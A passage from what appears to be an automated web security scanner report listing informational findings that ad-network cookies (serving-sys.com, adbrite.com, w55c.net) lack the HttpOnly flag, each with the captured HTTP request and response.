Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=2cd7097f-7369-4ae1-ac1c-c726ae580b4d3HM0b0; expires=Sat, 23-Jul-2011 20:35:44 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 25 Apr 2011 00:35:43 GMT
Connection: close
Content-Length: 3916

var part0 = '';
part0 += "<"+"!-- Do Not Remove - Turn Tracking Beacon Code - Do Not Remove -->\n";
part0 += "<"+"!-- Advertiser Name : MYFICO -->\n";
part0 += "<"+"!-- Beacon Name : MYFICO - RETARGE
...[SNIP]...

18.222. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442546&PluID=0&ord=&ord=3226986560327928345&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676553&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658553416&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658553422&frm=1&adk=513358139&ga_vid=780386006.1303658553&ga_sid=1303658553&ga_hid=1236518823&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=44901218&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGu0cbS00001eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGv0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui8TfJ0000000001uh93M20000000001uf8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSi04m400000eDVwaDPh084o00001hH4jaFhv09wy00001hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGu0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Sat, 23-Jul-2011 11:30:19 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui; expires=Sat, 23-Jul-2011 11:30:19 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 15:30:19 GMT
Connection: close


18.223. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4440217~~0~~~^ebAdDuration~15~0~01020&OptOut=0&ebRandom=0.2445763300638646&flv=10.2154&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
Origin: http://googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=7f28e9ba-7e75-4938-83a3-fd5f2acd1d9d3HM0b0; expires=Sat, 23-Jul-2011 12:13:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=0; expires=Sat, 23-Jul-2011 12:13:15 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 16:13:15 GMT
Connection: close
Content-Length: 0


18.224. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:40 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiosNK4qrzEstDAuTK8xrDHQKTYqLjKsMSyoTMvLq0msMTQsqVLSUUpKzMtLLcoEa1GqrQUA"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:40 GMT
Set-Cookie: vsd=0@1@4db48bb8@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:40 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

18.225. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=764562517870.2175?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; srh="1%3Aq64FAA%3D%3D"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsq0MrIqK6hQqgUA"; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; vsd=0@2@4db48be1@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 24-Jul-2011 00:56:51 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m9FNdBslhQjGHCNRx7sHvf2beC32iSv2luWo2FGKG02pbCmKOg05mGqrkNLdE7N6JXoGDIJnjnL%2BCWt9"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:51 GMT
Set-Cookie: vsd=0@1@4db4c6d3@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 00:56:51 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 25 Apr 2011 00:56:51 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

18.226. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:28:58 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Date: Sun, 24 Apr 2011 15:27:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6967

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUj
...[SNIP]...

18.227. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Date: Sun, 24 Apr 2011 14:53:07 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1451

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk
...[SNIP]...

18.228. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676544&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658544577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658544581&frm=1&adk=2614322350&ga_vid=1063735003.1303658545&ga_sid=1303658545&ga_hid=467631587&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:23 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzN
...[SNIP]...

18.229. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:39 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 14:52:24 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1248

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUk
...[SNIP]...

18.230. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

